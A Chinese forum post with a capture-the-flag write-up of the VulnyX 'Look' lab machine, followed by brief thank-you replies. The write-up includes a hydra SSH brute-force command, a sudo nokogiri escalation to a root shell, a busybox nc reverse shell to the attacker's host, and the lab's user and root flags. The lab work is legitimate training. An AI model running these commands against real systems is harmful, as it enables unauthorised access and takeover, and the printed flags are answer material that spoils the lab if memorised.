那虻 发表于 2025-7-8 21:36:09

vulnyx Look writeup

信息收集

arp-scan


nmap


获取userFlag

web上是一个apache默认页面

dirsearch扫下目录

扫到一个info.php,进去看一下

是一个phpinfo页面,翻一下可以找到一个用户axel

然后就是通过hydra进行爆破了
hydra -l axel -P 5000.txt ssh://192.168.43.30 -V -t 64 -e nsr
然后ssh上去

然后家目录下拿到userflag
userflag:084eb686418576cdde1ce01e2e9ad0dd
获取rootFlag

看一下/etc/passwd

发现还有一个dylan用户,那这里应该是要先拿到dylan,然后通过它提权到root。这里我翻了很久,运行了pspy64,linpeas.sh也没有看到可以利用的东西,最后看了看大佬的wp才发现dylan的密码在环境变量里:

切换到dylan用户上去,然后 sudo -l 看一下

发现可以执行nokogiri命令,这里直接执行nokogiri可以看到帮助文档

我这里是直接把帮助文档给ai了,然后得到了如下的提权方案:
sudo nokogiri -e '`/bin/bash`' anyfile这里直接执行/bin/bash可以拿到root shell,但是得到shell里没有回显,所以我后面是通过nc来反弹shell的
sudo nokogiri -e '`busybox nc 192.168.43.180 8888 -e /bin/bash`' anyfile
这里正常的思路应该是现file看一下这个文件

可以看到它是一个ruby写的脚本,去GTFobins上找ruby的提权方案

但直接这样执行成功不了

从使用示例这里可以看到需要指定一个文件

这样就可以提权到root了,还有就是可以直接解析一个文件,然后可以进入到一个irb的界面,就相当于一个ruby shell

然后在里面执行 exec "/bin/bash"

这样也能拿到root shell
rootflag:5e1a6f7770b8836974a6da06f32ecf6e
 

来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

庞环 发表于 2025-11-1 13:19:53

用心讨论,共获提升!

松菊 发表于 2025-11-28 00:15:13

分享、互助 让互联网精神温暖你我

站竣凰 发表于 2026-1-4 17:17:39

谢谢分享,辛苦了

殷罗绮 发表于 2026-1-14 07:39:50

感谢分享

鄂缮输 发表于 2026-1-14 15:32:08

热心回复!

尸酒岐 发表于 2026-1-16 18:05:39

谢谢分享,辛苦了

巩芷琪 发表于 2026-1-18 04:35:45

这个好,看起来很实用

艾晓梅 发表于 2026-1-22 10:43:10

收藏一下   不知道什么时候能用到

庞悦 发表于 2026-1-22 15:03:52

热心回复!

粹脍誊 发表于 2026-1-24 06:30:07

前排留名,哈哈哈

杜优瑗 发表于 2026-1-30 15:33:32

感谢分享,学习下。

邰怀卉 发表于 2026-2-2 05:12:03

谢谢分享,辛苦了

姨番单 发表于 2026-2-4 07:26:46

感谢分享

俞秋荣 发表于 2026-2-4 08:13:11

感谢发布原创作品,程序园因你更精彩

窝酴 发表于 2026-2-4 09:37:11

新版吗?好像是停更了吧。

尹疋 发表于 2026-2-6 04:11:45

用心讨论,共获提升!

鸠站 发表于 2026-2-6 12:02:34

新版吗?好像是停更了吧。

烯八 发表于 2026-2-8 20:08:13

yyds。多谢分享

高清宁 发表于 2026-2-9 02:06:31

感谢分享,学习下。
页: [1] 2
查看完整版本: vulnyx Look writeup